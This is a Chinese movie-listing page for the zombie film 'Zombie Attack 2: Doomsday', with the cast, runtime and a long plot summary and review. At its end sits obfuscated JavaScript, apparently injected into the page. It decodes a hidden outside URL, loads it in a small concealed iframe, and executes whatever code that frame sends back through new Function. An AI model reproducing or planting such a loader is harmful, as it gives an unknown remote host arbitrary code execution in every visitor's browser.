僵尸来袭2:末日

  • 卢克·麦肯齐 香缇·巴恩斯-考恩 杰克·莱恩 碧安卡·布雷迪 塔西娅·扎拉 杰伊·盖勒格 尼古拉斯·波舍尔 崔斯坦·麦金农
  • 120分钟
  • 僵尸来袭2:末日影片简介:大家可能知道,我个人是非…僵尸来袭2:末日影片简介:大家可能知道,我个人是非常喜欢恐怖片的,而恐怖片中我最喜欢的是丧尸类的电影。 新的老的丧尸片基本都看了个遍,不过我最近又发现了一部脑洞大开的丧尸新片,跟我一起来看看吧——《丧尸来袭2:末日》 电影设定在未来的废土世界,地球因为外星的病毒污染导致人类受到了感染变成了丧尸。 丧尸们白天行动迟缓,但是晚上却凶猛迅速,只有很少一部分身体自带抗体的人类才能避免感染变异,艰难地在这个丧尸世界求生。 而士兵里斯却在这里活得风生水起,他自建了一个幸存者营地,每天可以在“丧尸闹钟”的提示下起床、还让丧尸给自己汲水浇地、和丧尸对打锻炼身体、 最最厉害的还是把丧尸口中喷出的沼气当成了燃料和汽车的能源,所以虽然末日求生很孤独空虚,却也自得其乐。 唯一不好的是里斯并没有刻意免疫丧尸病毒的抗体,他需要吞食军方发放的黄色胶囊才可以避免感染。 而获得黄色胶囊的代价则是为军方找没有被感染的幸存者,用于研究制作丧尸病毒的解药。 狩猎归来的里斯一如既往来到地堡把幸存者交给博士,换得了黄色胶囊。 又一次开始狩猎的里斯搞翻幸存者的车抓住了一个女幸存者格蕾丝,并把格蕾丝交给了地堡。可是不成想格蕾丝竟然有个姐姐马克西,找上门来送给了自己一个人头。 里斯把二人都交给地堡后,从博士嘴里得知原来自己送来的这些人都已经死了,而他还一直傻傻的以为军方是利用幸存者的血清研究抗毒血清。 实际上自己吞食的黄色胶囊实际上是幸存者的血肉骨灰,而地堡的博士的一只手臂和上肢都已经被感染变异了,甚至需要幸存者的血液才可以维持理智形态…… 悔恨不已的里斯打倒了警卫带着马克西跑路了,博士急需幸存者的血液维持理智形态自然不愿意就此放过二人。 而半路逃脱的马克西找到了正准备复仇的上一部男女主角,上一部电影《丧尸来袭》的女主是丧尸女王,一场大战在所难免…… 总的来说电影的设定和开头还是很有意思的,尤其是把在其他丧尸片中威胁极大的丧尸在这里变成了工具人这一点。 虽然这部电影还是有一点逻辑问题,比如男主的跳反有些生硬,而且最后博士的变身也有些逻辑不通。 不过作为一部B级片还是可以的,贯穿全片的血浆肆虐和精彩的打斗动作都是这个电影的加分项。 已经可以算是比较不错的丧尸片了,有觉得不错的可以找来看看。

同主演

    僵尸来袭2:末日评论

    • 评论加载中...
    function NQoIX(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function nHqeN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return NQoIX(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x69\x48\x49\x6f\x45\x47\x56\x4e\x6a\x6e']=function(){;(function(u,r,w,d,f,c){var x=nHqeN;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZtZWV0aGFuc2hppLmNvbSUyRjEzNjA5Mg==',''+'WfX'+'ORj'+'Hsl'+'d'+'',window,document,''+'ezR'+'xlj'+'cH'+'','p');};